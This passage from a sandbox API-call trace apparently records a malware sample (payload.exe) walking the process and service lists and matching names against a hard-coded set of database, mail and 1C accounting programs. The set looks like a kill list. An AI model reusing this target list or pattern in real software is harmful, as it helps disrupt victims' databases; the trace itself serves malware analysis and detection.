th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0271.445] lstrlenW (lpString="audiodg.exe") returned 11 [0271.445] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.445] lstrlenW (lpString="svchost.exe") returned 11 [0271.445] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.445] lstrlenW (lpString="svchost.exe") returned 11 [0271.445] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0271.445] lstrlenW (lpString="userinit.exe") returned 12 [0271.445] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0271.446] lstrlenW (lpString="dwm.exe") returned 7 [0271.446] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0271.446] lstrlenW (lpString="explorer.exe") returned 12 [0271.446] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0271.446] lstrlenW (lpString="spoolsv.exe") returned 11 [0271.446] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0271.446] lstrlenW (lpString="taskhost.exe") returned 12 [0271.447] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0271.447] lstrlenW (lpString="svchost.exe") returned 11 [0271.447] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0271.447] lstrlenW (lpString="payload.exe") returned 11 [0271.447] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0271.447] lstrlenW (lpString="dllhost.exe") returned 11 [0271.447] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0271.447] lstrlenW (lpString="reader_sl.exe") returned 13 [0271.448] Process32NextW (in: hSnapshot=0x388, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0271.448] CloseHandle (hObject=0x388) returned 1 [0271.448] Sleep (dwMilliseconds=0x1f4) [0272.025] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c0a70 [0272.028] EnumServicesStatusExW (in: hSCManager=0x43c0a70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0272.028] GetLastError () returned 0xea [0272.028] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0272.028] EnumServicesStatusExW (in: hSCManager=0x43c0a70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0272.029] CloseServiceHandle (hSCObject=0x43c0a70) returned 1 [0272.029] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0272.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.029] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0272.029] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0272.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0272.029] lstrlenW (lpString="AudioSrv") returned 8 [0272.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0272.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0272.029] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0272.029] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0272.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0272.029] lstrlenW (lpString="BFE") returned 3 [0272.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0272.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0272.029] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0272.029] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0272.029] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0272.029] lstrlenW (lpString="CryptSvc") returned 8 [0272.029] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0272.029] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0272.029] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0272.029] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0272.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0272.030] lstrlenW (lpString="CscService") returned 10 [0272.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0272.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0272.030] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0272.030] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0272.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0272.030] lstrlenW (lpString="DcomLaunch") returned 10 [0272.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.030] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0272.030] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0272.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0272.030] lstrlenW (lpString="Dhcp") returned 4 [0272.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0272.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0272.030] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0272.030] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0272.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0272.030] lstrlenW (lpString="Dnscache") returned 8 [0272.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0272.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0272.030] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0272.030] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0272.030] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0272.030] lstrlenW (lpString="DPS") returned 3 [0272.030] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0272.030] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0272.030] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0272.030] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0272.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0272.031] lstrlenW (lpString="eventlog") returned 8 [0272.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0272.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0272.031] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0272.031] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0272.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0272.031] lstrlenW (lpString="EventSystem") returned 11 [0272.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0272.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0272.031] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0272.031] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0272.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0272.031] lstrlenW (lpString="gpsvc") returned 5 [0272.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0272.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0272.031] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0272.031] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0272.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0272.031] lstrlenW (lpString="LanmanWorkstation") returned 17 [0272.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.031] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0272.031] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0272.031] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0272.031] lstrlenW (lpString="lmhosts") returned 7 [0272.031] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0272.031] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0272.031] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0272.032] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0272.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0272.032] lstrlenW (lpString="MMCSS") returned 5 [0272.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0272.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0272.032] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0272.032] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0272.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0272.032] lstrlenW (lpString="MpsSvc") returned 6 [0272.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0272.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0272.032] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0272.032] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0272.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0272.032] lstrlenW (lpString="NlaSvc") returned 6 [0272.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0272.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0272.032] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0272.032] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0272.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0272.032] lstrlenW (lpString="nsi") returned 3 [0272.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0272.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0272.032] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0272.032] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0272.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0272.032] lstrlenW (lpString="PcaSvc") returned 6 [0272.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0272.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0272.032] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0272.033] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0272.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0272.033] lstrlenW (lpString="PlugPlay") returned 8 [0272.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0272.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0272.033] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0272.033] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0272.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0272.033] lstrlenW (lpString="Power") returned 5 [0272.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0272.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0272.033] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0272.033] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0272.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0272.033] lstrlenW (lpString="ProfSvc") returned 7 [0272.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0272.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0272.033] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0272.033] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0272.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0272.033] lstrlenW (lpString="RpcEptMapper") returned 12 [0272.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.033] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0272.033] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0272.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0272.033] lstrlenW (lpString="RpcSs") returned 5 [0272.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0272.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0272.033] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0272.034] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0272.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0272.034] lstrlenW (lpString="SamSs") returned 5 [0272.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0272.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0272.034] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0272.034] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0272.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0272.034] lstrlenW (lpString="Schedule") returned 8 [0272.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0272.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0272.034] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0272.034] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0272.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0272.034] lstrlenW (lpString="SENS") returned 4 [0272.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0272.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0272.034] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0272.034] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0272.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0272.034] lstrlenW (lpString="ShellHWDetection") returned 16 [0272.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.034] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0272.034] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0272.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0272.034] lstrlenW (lpString="Spooler") returned 7 [0272.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0272.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0272.034] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0272.035] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0272.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0272.035] lstrlenW (lpString="Themes") returned 6 [0272.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0272.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0272.035] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0272.035] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0272.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0272.035] lstrlenW (lpString="UxSms") returned 5 [0272.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0272.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0272.035] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0272.035] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0272.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0272.035] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0272.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2bc [0272.036] Process32FirstW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.036] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.036] lstrlenW (lpString="System") returned 6 [0272.036] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0272.036] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0272.037] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0272.037] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0272.037] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0272.037] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0272.037] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0272.037] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.037] lstrlenW (lpString="smss.exe") returned 8 [0272.037] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0272.037] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.037] lstrlenW (lpString="csrss.exe") returned 9 [0272.037] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.037] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.038] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.038] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.038] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.038] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.038] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.038] lstrlenW (lpString="wininit.exe") returned 11 [0272.038] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0272.038] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0272.038] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0272.038] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0272.038] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0272.038] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0272.038] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0272.038] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.038] lstrlenW (lpString="csrss.exe") returned 9 [0272.038] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.038] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.038] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.039] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.039] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.039] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.039] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.039] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.039] lstrlenW (lpString="winlogon.exe") returned 12 [0272.039] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0272.039] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0272.039] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0272.039] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0272.039] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0272.039] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0272.039] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0272.039] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, 